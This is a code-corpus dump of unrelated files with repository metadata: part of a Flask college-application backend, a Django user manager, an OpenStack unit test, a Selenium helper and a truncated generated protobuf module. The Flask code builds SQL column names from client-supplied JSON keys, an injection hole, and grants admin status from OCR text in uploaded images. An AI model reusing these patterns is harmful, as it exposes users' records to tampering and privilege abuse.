valTuple = ()
for (k,v) in keyval.items():
valTuple = valTuple + (v, )
cursor.execute(query, valTuple)
def UpdateIntoDB(tablename, keyval, target_keyval, conn, cursor):
for (k,v) in keyval.items():
query = "UPDATE " + tablename + " SET " + k + " = %s WHERE %s = studentid"
valTuple = ()
valTuple = (v, ) + (target_keyval, )
query = str(query)
cursor.execute(query, valTuple)
# using SendGrid's Python Library
# https://github.com/sendgrid/sendgrid-python
# import sendgrid
# import os
# from sendgrid.helpers.mail import *
# sg = sendgrid.SendGridAPIClient(apikey=os.environ.get('SENDGRID_API_KEY'))
# from_email = Email("sanatmouli@gmail.com")
# to_email = Email("sanatmouli@gmail.com")
# subject = "Sending with SendGrid is Fun"
# content = Content("text/plain", "and easy to do anywhere, even with Python")
# mail = Mail(from_email, subject, to_email, content)
# response = sg.client.mail.send.post(request_body=mail.get())
# print(response.status_code)
# print(response.body)
# print(response.headers)
@app.route("/sendEmail/<email_id>/<collegename>", methods = ['GET'])
def sendEmail(email_id, collegename):
mail = initEmailService()
msg = Message('Hello', sender = 'collegeappio3@gmail.com', recipients = [email_id])
#msg.body = "Congratulations! You have applied to " + str(collegename) + ""
msg.html = render_template("email-template-college.html", cname = collegename)
response = mail.send(msg)
print "REsponse is:", response
return jsonify("Sent")
@app.route("/sendEmailtoStudent/<email_id>/<fname>", methods = ['GET'])
def sendEmailtoStudent(email_id, fname):
mail = initEmailService()
msg = Message('Hello', sender = 'collegeappio3@gmail.com', recipients = [email_id])
msg.body = "Congratulations "+ fname + "! You have finished your application! Please go ahead and submit your college applications!"
#msg.html = render_template("email-template-college.html", cname = collegename)
response = mail.send(msg)
print "Response is:", response
return jsonify("Sent")
#@app.route("/sendEmailAccept/<email_id>/<collegename>/<studentname>", methods = ['GET'])
def sendEmailAccept(email_id, collegename, studentname):
mail = initEmailService()
msg = Message('Hello', sender = 'collegeappio3@gmail.com', recipients = [email_id])
#msg.body = "Congratulations! You have applied to " + str(collegename) + ""
msg.html = render_template("email-template-accept.html", cname = collegename, sname = studentname)
response = mail.send(msg)
print "Response is:", response
return jsonify("Sent")
#@app.route("/sendEmailReject/<email_id>/<collegename>/<studentname>", methods = ['GET'])
def sendEmailReject(email_id, collegename, studentname):
mail = initEmailService()
msg = Message('Hello', sender = 'collegeappio3@gmail.com', recipients = [email_id])
#msg.body = "Congratulations! You have applied to " + str(collegename) + ""
msg.html = render_template("email-template-reject.html", cname = collegename, sname = studentname)
response = mail.send(msg)
print "Response is:", response
return jsonify("Sent")
@app.route("/sendEmailStatus/<email_id>/<collegename>/<studentid>/<accept_status>", methods = ['GET'])
def sendEmailStatus(email_id, collegename, studentid, accept_status):
conn, cur = initDB()
cur.execute("SELECT fname, lname FROM students where studentid = %s", (studentid, ))
row = cur.fetchone()
name = row[0] + " " + row[1]
if int(accept_status) == 1:
sendEmailAccept(email_id, collegename, name)
elif int(accept_status) == 2:
sendEmailReject(email_id, collegename, name)
cur.execute("SELECT collegeid from colleges WHERE collegename = %s", (collegename, ))
row = cur.fetchone()
collegeid = row[0]
print(row)
query = "UPDATE current_application SET acceptancestatus = %s WHERE studentid = %s AND collegeid = %s"
cur.execute(query, (str(accept_status), studentid, collegeid,))
query = "SELECT race, act, sat, gpa, num_ap, sex, current_application.major FROM students, current_application WHERE students.studentid = %s AND collegeid = %s"
cur.execute(query, (studentid, collegeid))
row = cur.fetchone()
race = row[0]
act = row[1]
sat = row[2]
gpa = row[3]
num_ap = row[4]
sex = row[5]
major = row[6]
sex_act = 1
print(row)
if (sex == "MALE"):
sex_act = 0
query = "SELECT collegeName FROM colleges WHERE collegeid = %s"
cur.execute(query, (collegeid, ))
row = cur.fetchone()
collegeName = row[0]
query = "SELECT historicalid FROM historicalapplication ORDER BY historicalid DESC LIMIT 1"
cur.execute(query)
row = cur.fetchone()
id = row[0]
print(row)
if (row[0] is None):
id = 0
else:
id = int(row[0]) + 1
query = "INSERT INTO historicalapplication (historicalid, race, act, sat, gpa, num_ap, sex, major, collegeid, decision, college) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
cur.execute(query, (id, race, act, sat, gpa, num_ap, sex_act, major, collegeid, int(accept_status), collegeName, ))
print("done")
conn.commit()
cur.close()
response = jsonify("200")
response.status_code = 200
return response
@app.route("/putStudents", methods = ['POST'])
def putStudents():
conn, cur = initDB()
text = ast.literal_eval(json.dumps(request.get_json()))
student_id = text["studentid"]
UpdateIntoDB('students', text, student_id, conn, cur)
conn.commit()
cur.close()
response = jsonify("HI")
response.status_code = 200
return response
def xstr(s):
if s is None:
return ''
return str(s)
@app.route("/getStudents/<uid>", methods = ['GET'])
def getStudents(uid):
conn, cur = initDB()
cur.execute("SELECT * FROM students WHERE studentid = %s", (uid, ))
# Fetch column names of postgres table
colnames = [desc[0] for desc in cur.description]
keyval = {}
for row in cur:
temp = ast.literal_eval(json.dumps(colnames))
for i in range (0, len(temp)):
obj = {
temp[i] : xstr(row[i]),
}
keyval.update(obj)
print jsonify(keyval)
response = jsonify(keyval)
print "response: ", response
response.status_code = 200
cur.close()
return response
def UpdateIntoAdminDB(tablename, keyval, target_keyval, conn, cursor):
for (k,v) in keyval.items():
query = "UPDATE " + tablename + " SET " + k + " = %s WHERE %s = collegename"
valTuple = ()
valTuple = (v, ) + (target_keyval, )
query = str(query)
cursor.execute(query, valTuple)
@app.route("/setCollegeDetails/<collegename>", methods = ['POST'])
def setCollegeDetails(collegename):
conn, cur = initDB()
text = ast.literal_eval(json.dumps(request.get_json()))
#admin_id = text["collegename"]
admin_id = str(collegename)
UpdateIntoAdminDB('colleges', text, admin_id, conn, cur)
conn.commit()
cur.close()
response = jsonify("HI")
response.status_code = 200
return response
@app.route("/setCollegeQuestions/<collegename>", methods = ['POST'])
def setCollegeQuestions(collegename):
conn, cur = initDB()
text = ast.literal_eval(json.dumps(request.get_json()))
#admin_id = text["collegename"]
admin_id = str(collegename)
UpdateIntoAdminDB('colleges', text, admin_id, conn, cur)
conn.commit()
cur.close()
response = jsonify("HI")
response.status_code = 200
return response
@app.route("/getCollegeName", methods = ['GET'])
def getCollegeName():
conn, cur = initDB()
cur.execute("SELECT collegeName FROM colleges")
result = []
for row in cur:
result.append(row[0])
response = jsonify(result)
response.status_code = 200
conn.commit()
cur.close()
return response
@app.route("/getIDType/<sid>", methods=['GET'])
def getIDType(sid):
conn, cur = initDB()
ans = ""
cur.execute("SELECT admin_id FROM admin WHERE admin_id = %s", (sid, ))
row = cur.fetchone()
if row != None:
ans = "admin"
else :
ans = "student"
response = jsonify(ans)
conn.commit()
cur.close()
return response
@app.route("/getCollegeNameForUID/<uid>", methods=['GET'])
def getCollegeNameForUID(uid):
conn, cur = initDB()
cur.execute("SELECT college FROM admin WHERE admin_id = %s", (uid, ))
row = cur.fetchone()
response = jsonify(row)
response.status_code = 200
conn.commit()
cur.close()
return response
@app.route("/getStudentsForCollegeName/<collegename>", methods=['GET'])
def getStudentsForCollegeName(collegename):
#get first query to fetch collegeID for that collegename in collegetable
#get second query in curernt_applications table to fetch q1, q2, q3 and studentID for that collegeID
#for each row in second query, get the student details
conn, cur = initDB()
cur.execute("SELECT collegeid FROM colleges WHERE collegename = %s", (collegename, ))
row = cur.fetchone()
collegeid = (row, )
#cur.execute("SELECT q1, q2, q3, studentid FROM current_application WHERE collegeid = %s", collegeid)
cur.execute("SELECT current_application.questions, current_application.studentid, students.fname FROM current_application LEFT JOIN students on students.studentid = current_application.studentid WHERE current_application.collegeid = %s", collegeid)
result = []
for r in cur:
result.append(r)
response = jsonify(result)
response.status_code = 200
conn.commit()
cur.close()
return response
@app.route("/getListOfAcceptedStudents/<collegename>", methods=['GET'])
def getListOfAcceptedStudents(collegename):
conn, cur = initDB()
cur.execute("SELECT collegeid FROM colleges WHERE collegename = %s", (collegename, ))
row = cur.fetchone()
collegeid = (row, )
cur.execute("SELECT race, decision, sex, act, sat, num_ap, major, gpa FROM historicalapplication WHERE collegeid = %s", (collegeid, ))
result = []
for row in cur:
obj = {
'race' : row[0],
'decision' : row[1],
'sex' : row[2],
'act' : row[3],
'sat' : row[4],
'num_ap' : row[5],
'major' : row[6],
'gpa' : float(row[7]),
}
result.append(obj)
response = jsonify(result)
response.status_code = 200
conn.commit()
cur.close()
return response
@app.route("/getStatsEachStudent", methods=['GET'])
def getStatsEachStudent():
conn, cur = initDB()
collegename = request.headers.get('collegeName')
cur.execute("SELECT act, sat, num_ap, gpa, race, major, decision, CASE WHEN sex = '1' then 'Female' WHEN sex = '0' then 'Other' WHEN sex = '2' then 'Male' END AS SEX FROM historicalapplication where college = %s", (collegename, ))
result1 = []
result2 = []
result3 = []
result4 = []
result5 = []
result6 = []
result7 = []
result8 = []
result = []
for row in cur:
obj1 = {
'act' : row[0]
}
result1.append(obj1)
obj2 = {
'sat' : row[1]
}
result2.append(obj2)
obj3 = {
'num_ap' : row[2]
}
result3.append(obj3)
obj4 = {
'gpa' : float(row[3])
}
result4.append(obj4)
obj5 = {
'race' : row[4]
}
result5.append(obj5)
obj6 = {
'major' : row[5]
}
result6.append(obj6)
obj7 = {
'sex' : row[7]
}
result7.append(obj7)
obj8 = {
'decision' : row[6]
}
result8.append(obj8)
result.append(result1)
result.append(result2)
result.append(result3)
result.append(result4)
result.append(result5)
result.append(result6)
result.append(result7)
result.append(result8)
response = jsonify(result)
response.status_code = 200
conn.commit()
cur.close()
return response
@app.route("/getCollegeStatsEachMajor", methods=['GET'])
def getCollegeStatsEachMajor():
collegename = request.headers.get('collegeName')
result = []
conn, cur = initDB()
cur.execute("SELECT major, AVG(act), AVG(sat), AVG(num_ap), AVG(gpa) FROM historicalapplication where college = %s GROUP BY major", (collegename,))
for row in cur:
obj = {
'major' : row[0],
'act' : float(row[1]),
'sat' : float(row[2]),
'num_ap' : float(row[3]),
'gpa' : float(row[4]),
}
result.append(obj)
conn.close()
return jsonify(result)
def upload_plain_object_to_s3(s3, S3_LOCATION, file, bucket_name, fname, acl="public-read"):
try:
s3.put_object(
Body=file,
Bucket=bucket_name,
Key=fname,
ContentType="image/png"
)
except Exception as e:
print "Something Happened: ", e
return e
return "{}{}".format(S3_LOCATION, fname)
@app.route("/postImage", methods=['POST'])
#@cross_origin(origin='http://localhost:4200',headers=['Content-Type','Authorization','Access-Control-Allow-Origin','Access-Control-Allow-Methods'])
def postImage():
S3_BUCKET = os.environ.get("S3_BUCKET")
S3_KEY = os.environ.get("aws_access_key_id")
S3_SECRET = os.environ.get("aws_secret_access_key")
S3_LOCATION = 'http://{}.s3.amazonaws.com/'.format(S3_BUCKET)
SECRET_KEY = os.urandom(32)
DEBUG = True
PORT = 5000
#Establish a connection to S3
s3 = boto3.client(
"s3",
aws_access_key_id=S3_KEY,
aws_secret_access_key=S3_SECRET,
)
# Load Json Payload into dict
keyval = json.loads(request.data)
# Iterate over headers in request.data
# for key, value in keyval.iteritems():
# print key
# Issue of FileReader.readAsDataURL() in angular sending a string that cannot be directly decoded as Base64
# To fix this issue we must remove "data:image/png;base64," from the start of the Blob
# more information here: https://developer.mozilla.org/en-US/docs/Web/API/FileReader/readAsDataURL
head, data = keyval['image'].split(',')
# decode the image
decoded = data.decode('base64','strict')
# If image is not found in keyval then t
if 'image' not in keyval:
return "No image key found in the server side when /postImage was called. Set Header as 'image':'{data}'"
if 'fname' not in keyval:
return "No object name found in the server"
fname = keyval['fname']
# Make the upload to S3 service
output = upload_plain_object_to_s3(s3, S3_LOCATION, decoded, S3_BUCKET, fname)
# Connect to recognition service
rekognition = boto3.client("rekognition", "us-east-2")
response = rekognition.detect_text(
Image={
'S3Object': {
'Bucket': S3_BUCKET,
'Name': fname,
}
}
)
# Load the text from recognition into map
map = {}
for label in response['TextDetections']:
# Fix any anomalies in text detection
map[label['DetectedText'].lower().replace("-", "")] = label['DetectedText']
# Check for valid keywords
if "university" in map or "college" in map:
for k, v in map.iteritems():
if "admin" in k:
return jsonify({'ADMIN' : 'TRUE', 's3URL': output})
return jsonify({'ADMIN' : 'FALSE', 's3URL': output})
if __name__ == '__main__':
conn, cur = initDB()
app.run(debug=True)
| 35,339 | 4 | 1,137 |
e98bfba7bd19220e49c95672db2024072278f987 | 852 | py | Python | users/managers.py | zware/pythondotorg | 00537089b1cfe29de2e71b4e1685baa14aa4475b | [
"Apache-2.0"
] | 1 | 2021-02-12T10:23:37.000Z | 2021-02-12T10:23:37.000Z | users/managers.py | zware/pythondotorg | 00537089b1cfe29de2e71b4e1685baa14aa4475b | [
"Apache-2.0"
] | null | null | null | users/managers.py | zware/pythondotorg | 00537089b1cfe29de2e71b4e1685baa14aa4475b | [
"Apache-2.0"
] | null | null | null | from django.contrib.auth.models import UserManager as BaseUserManager
from django.db.models.query import QuerySet
| 25.818182 | 73 | 0.707746 | from django.contrib.auth.models import UserManager as BaseUserManager
from django.db.models.query import QuerySet
class UserQuerySet(QuerySet):
def public_email(self):
return self.filter(email_privacy__exact=self.model.SEARCH_PUBLIC)
def searchable(self):
return self.filter(
public_profile=True,
search_visibility__exact=self.model.SEARCH_PUBLIC,
)
def public_profile(self):
return self.filter(public_profile=True)
class UserManager(BaseUserManager):
def get_queryset(self):
return UserQuerySet(self.model, using=self._db)
def public_email(self):
return self.get_queryset().email_is_public()
def searchable(self):
return self.get_queryset().searchable()
def public_profile(self):
return self.get_queryset().public_profile()
| 479 | 22 | 235 |
d37a7328f20672a0e0830ad7ddcf87251bffe2f6 | 1,499 | py | Python | openstack/tests/unit/shared_file_system/v2/test_availability_zone.py | horion/openstacksdk | cbb0e12e1dc944847f2ba0e67bf35b9c7a67b3a3 | [
"Apache-2.0"
] | 99 | 2018-03-28T15:41:45.000Z | 2022-01-23T17:22:13.000Z | openstack/tests/unit/shared_file_system/v2/test_availability_zone.py | horion/openstacksdk | cbb0e12e1dc944847f2ba0e67bf35b9c7a67b3a3 | [
"Apache-2.0"
] | 5 | 2018-05-25T16:54:23.000Z | 2021-11-21T02:27:16.000Z | openstack/tests/unit/shared_file_system/v2/test_availability_zone.py | horion/openstacksdk | cbb0e12e1dc944847f2ba0e67bf35b9c7a67b3a3 | [
"Apache-2.0"
] | 104 | 2018-04-06T14:33:54.000Z | 2022-03-01T01:58:09.000Z | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from openstack.shared_file_system.v2 import availability_zone as az
from openstack.tests.unit import base
IDENTIFIER = '08a87d37-5ca2-4308-86c5-cba06d8d796c'
EXAMPLE = {
"id": IDENTIFIER,
"name": "nova",
"created_at": "2021-01-21T20:13:55.000000",
"updated_at": None,
}
| 38.435897 | 75 | 0.735824 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from openstack.shared_file_system.v2 import availability_zone as az
from openstack.tests.unit import base
IDENTIFIER = '08a87d37-5ca2-4308-86c5-cba06d8d796c'
EXAMPLE = {
"id": IDENTIFIER,
"name": "nova",
"created_at": "2021-01-21T20:13:55.000000",
"updated_at": None,
}
class TestAvailabilityZone(base.TestCase):
def test_basic(self):
az_resource = az.AvailabilityZone()
self.assertEqual('availability_zones', az_resource.resources_key)
self.assertEqual('/availability-zones', az_resource.base_path)
self.assertTrue(az_resource.allow_list)
def test_make_availability_zone(self):
az_resource = az.AvailabilityZone(**EXAMPLE)
self.assertEqual(EXAMPLE['id'], az_resource.id)
self.assertEqual(EXAMPLE['name'], az_resource.name)
self.assertEqual(EXAMPLE['created_at'], az_resource.created_at)
self.assertEqual(EXAMPLE['updated_at'], az_resource.updated_at)
| 567 | 21 | 77 |
7dc52c336a973436d4ce90d93fc46438921715e3 | 496 | py | Python | helper.py | peitaosu/Widowmaker | 60878a748d356c1402e85dec31c9c0d453e16b9c | [
"MIT"
] | 1 | 2017-10-25T14:07:21.000Z | 2017-10-25T14:07:21.000Z | helper.py | peitaosu/Widowmaker | 60878a748d356c1402e85dec31c9c0d453e16b9c | [
"MIT"
] | null | null | null | helper.py | peitaosu/Widowmaker | 60878a748d356c1402e85dec31c9c0d453e16b9c | [
"MIT"
] | null | null | null | from selenium import webdriver | 27.555556 | 60 | 0.655242 | from selenium import webdriver
class Helper():
def __init__(self):
self.driver = webdriver.Chrome()
def get_element_by_xpath(self, page, xpath):
self.driver.get(page)
element = self.driver.find_element_by_xpath(xpath)
return element
def get_elements_by_xpath(self, page, xpath):
self.driver.get(page)
elements = self.driver.find_elements_by_xpath(xpath)
return elements
def quit(self):
self.driver.quit() | 334 | -6 | 138 |
59869c8e260a4f2ae332b76f9bc7fec63da9713e | 29,525 | py | Python | python/github_com/TheThingsNetwork/api/router/router_pb2.py | LukasHabring/api | 9e3da3462f14dab4c45fa38b03335e85e1970833 | [
"MIT"
] | 14 | 2017-07-14T16:11:54.000Z | 2021-11-16T12:35:37.000Z | python/github_com/TheThingsNetwork/api/router/router_pb2.py | LukasHabring/api | 9e3da3462f14dab4c45fa38b03335e85e1970833 | [
"MIT"
] | 34 | 2017-07-14T15:15:13.000Z | 2021-08-18T10:08:10.000Z | python/github_com/TheThingsNetwork/api/router/router_pb2.py | LukasHabring/api | 9e3da3462f14dab4c45fa38b03335e85e1970833 | [
"MIT"
] | 12 | 2017-07-25T16:13:16.000Z | 2021-05-08T07:21:50.000Z | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: github.com/TheThingsNetwork/api/router/router.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
from github_com.TheThingsNetwork.api import api_pb2 as github_dot_com_dot_TheThingsNetwork_dot_api_dot_api__pb2
from github_com.TheThingsNetwork.api.protocol import protocol_pb2 as github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2
from github_com.TheThingsNetwork.api.gateway import gateway_pb2 as github_dot_com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2
from github_com.TheThingsNetwork.api.trace import trace_pb2 as github_dot_com_dot_TheThingsNetwork_dot_api_dot_trace_dot_trace__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='github.com/TheThingsNetwork/api/router/router.proto',
package='router',
syntax='proto3',
serialized_options=b'\n\037org.thethingsnetwork.api.routerB\013RouterProtoP\001Z&github.com/TheThingsNetwork/api/router\252\002\033TheThingsNetwork.API.Router',
serialized_pb=b'\n3github.com/TheThingsNetwork/api/router/router.proto\x12\x06router\x1a\x1bgoogle/protobuf/empty.proto\x1a-github.com/gogo/protobuf/gogoproto/gogo.proto\x1a)github.com/TheThingsNetwork/api/api.proto\x1a\x37github.com/TheThingsNetwork/api/protocol/protocol.proto\x1a\x35github.com/TheThingsNetwork/api/gateway/gateway.proto\x1a\x31github.com/TheThingsNetwork/api/trace/trace.proto\"\x12\n\x10SubscribeRequest\"\xcd\x01\n\rUplinkMessage\x12\x0f\n\x07payload\x18\x01 \x01(\x0c\x12\"\n\x07message\x18\x02 \x01(\x0b\x32\x11.protocol.Message\x12\x35\n\x11protocol_metadata\x18\x0b \x01(\x0b\x32\x14.protocol.RxMetadataB\x04\xc8\xde\x1f\x00\x12\x33\n\x10gateway_metadata\x18\x0c \x01(\x0b\x32\x13.gateway.RxMetadataB\x04\xc8\xde\x1f\x00\x12\x1b\n\x05trace\x18\x15 \x01(\x0b\x32\x0c.trace.Trace\"\xe3\x01\n\x0f\x44ownlinkMessage\x12\x0f\n\x07payload\x18\x01 \x01(\x0c\x12\"\n\x07message\x18\x02 \x01(\x0b\x32\x11.protocol.Message\x12?\n\x16protocol_configuration\x18\x0b \x01(\x0b\x32\x19.protocol.TxConfigurationB\x04\xc8\xde\x1f\x00\x12=\n\x15gateway_configuration\x18\x0c \x01(\x0b\x32\x18.gateway.TxConfigurationB\x04\xc8\xde\x1f\x00\x12\x1b\n\x05trace\x18\x15 \x01(\x0b\x32\x0c.trace.Trace\"\xbe\x03\n\x17\x44\x65viceActivationRequest\x12\x0f\n\x07payload\x18\x01 \x01(\x0c\x12\"\n\x07message\x18\x02 \x01(\x0b\x32\x11.protocol.Message\x12T\n\x07\x64\x65v_eui\x18\x0b \x01(\x0c\x42\x43\xe2\xde\x1f\x06\x44\x65vEUI\xc8\xde\x1f\x00\xda\xde\x1f\x31github.com/TheThingsNetwork/ttn/core/types.DevEUI\x12T\n\x07\x61pp_eui\x18\x0c \x01(\x0c\x42\x43\xe2\xde\x1f\x06\x41ppEUI\xc8\xde\x1f\x00\xda\xde\x1f\x31github.com/TheThingsNetwork/ttn/core/types.AppEUI\x12\x35\n\x11protocol_metadata\x18\x15 \x01(\x0b\x32\x14.protocol.RxMetadataB\x04\xc8\xde\x1f\x00\x12\x33\n\x10gateway_metadata\x18\x16 \x01(\x0b\x32\x13.gateway.RxMetadataB\x04\xc8\xde\x1f\x00\x12\x39\n\x13\x61\x63tivation_metadata\x18\x17 \x01(\x0b\x32\x1c.protocol.ActivationMetadata\x12\x1b\n\x05trace\x18\x1f \x01(\x0b\x32\x0c.trace.Trace\"\x1a\n\x18\x44\x65viceActivationResponse\"9\n\x14GatewayStatusRequest\x12!\n\ngateway_id\x18\x01 \x01(\tB\r\xe2\xde\x1f\tGatewayID\"Q\n\x15GatewayStatusResponse\x12\x11\n\tlast_seen\x18\x01 \x01(\x03\x12%\n\x06status\x18\x02 \x01(\x0b\x32\x0f.gateway.StatusB\x04\xc8\xde\x1f\x00\"\x0f\n\rStatusRequest\"\x88\x02\n\x06Status\x12 \n\x06system\x18\x01 \x01(\x0b\x32\x10.api.SystemStats\x12&\n\tcomponent\x18\x02 \x01(\x0b\x32\x13.api.ComponentStats\x12\"\n\x0egateway_status\x18\x0b \x01(\x0b\x32\n.api.Rates\x12\x1a\n\x06uplink\x18\x0c \x01(\x0b\x32\n.api.Rates\x12\x1c\n\x08\x64ownlink\x18\r \x01(\x0b\x32\n.api.Rates\x12\x1f\n\x0b\x61\x63tivations\x18\x0e \x01(\x0b\x32\n.api.Rates\x12\x1a\n\x12\x63onnected_gateways\x18\x15 \x01(\r\x12\x19\n\x11\x63onnected_brokers\x18\x16 \x01(\r2\x90\x02\n\x06Router\x12:\n\rGatewayStatus\x12\x0f.gateway.Status\x1a\x16.google.protobuf.Empty(\x01\x12\x39\n\x06Uplink\x12\x15.router.UplinkMessage\x1a\x16.google.protobuf.Empty(\x01\x12@\n\tSubscribe\x12\x18.router.SubscribeRequest\x1a\x17.router.DownlinkMessage0\x01\x12M\n\x08\x41\x63tivate\x12\x1f.router.DeviceActivationRequest\x1a .router.DeviceActivationResponse2\x91\x01\n\rRouterManager\x12L\n\rGatewayStatus\x12\x1c.router.GatewayStatusRequest\x1a\x1d.router.GatewayStatusResponse\x12\x32\n\tGetStatus\x12\x15.router.StatusRequest\x1a\x0e.router.StatusBv\n\x1forg.thethingsnetwork.api.routerB\x0bRouterProtoP\x01Z&github.com/TheThingsNetwork/api/router\xaa\x02\x1bTheThingsNetwork.API.Routerb\x06proto3'
,
dependencies=[google_dot_protobuf_dot_empty__pb2.DESCRIPTOR,github_dot_com_dot_TheThingsNetwork_dot_api_dot_api__pb2.DESCRIPTOR,github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2.DESCRIPTOR,github_dot_com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2.DESCRIPTOR,github_dot_com_dot_TheThingsNetwork_dot_api_dot_trace_dot_trace__pb2.DESCRIPTOR,])
_SUBSCRIBEREQUEST = _descriptor.Descriptor(
name='SubscribeRequest',
full_name='router.SubscribeRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=345,
serialized_end=363,
)
_UPLINKMESSAGE = _descriptor.Descriptor(
name='UplinkMessage',
full_name='router.UplinkMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='payload', full_name='router.UplinkMessage.payload', index=0,
number=1, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='message', full_name='router.UplinkMessage.message', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='protocol_metadata', full_name='router.UplinkMessage.protocol_metadata', index=2,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000', file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='gateway_metadata', full_name='router.UplinkMessage.gateway_metadata', index=3,
number=12, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000', file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='trace', full_name='router.UplinkMessage.trace', index=4,
number=21, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=366,
serialized_end=571,
)
_DOWNLINKMESSAGE = _descriptor.Descriptor(
name='DownlinkMessage',
full_name='router.DownlinkMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='payload', full_name='router.DownlinkMessage.payload', index=0,
number=1, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='message', full_name='router.DownlinkMessage.message', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='protocol_configuration', full_name='router.DownlinkMessage.protocol_configuration', index=2,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000', file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='gateway_configuration', full_name='router.DownlinkMessage.gateway_configuration', index=3,
number=12, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000', file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='trace', full_name='router.DownlinkMessage.trace', index=4,
number=21, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=574,
serialized_end=801,
)
_DEVICEACTIVATIONREQUEST = _descriptor.Descriptor(
name='DeviceActivationRequest',
full_name='router.DeviceActivationRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='payload', full_name='router.DeviceActivationRequest.payload', index=0,
number=1, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='message', full_name='router.DeviceActivationRequest.message', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='dev_eui', full_name='router.DeviceActivationRequest.dev_eui', index=2,
number=11, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\342\336\037\006DevEUI\310\336\037\000\332\336\0371github.com/TheThingsNetwork/ttn/core/types.DevEUI', file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='app_eui', full_name='router.DeviceActivationRequest.app_eui', index=3,
number=12, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\342\336\037\006AppEUI\310\336\037\000\332\336\0371github.com/TheThingsNetwork/ttn/core/types.AppEUI', file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='protocol_metadata', full_name='router.DeviceActivationRequest.protocol_metadata', index=4,
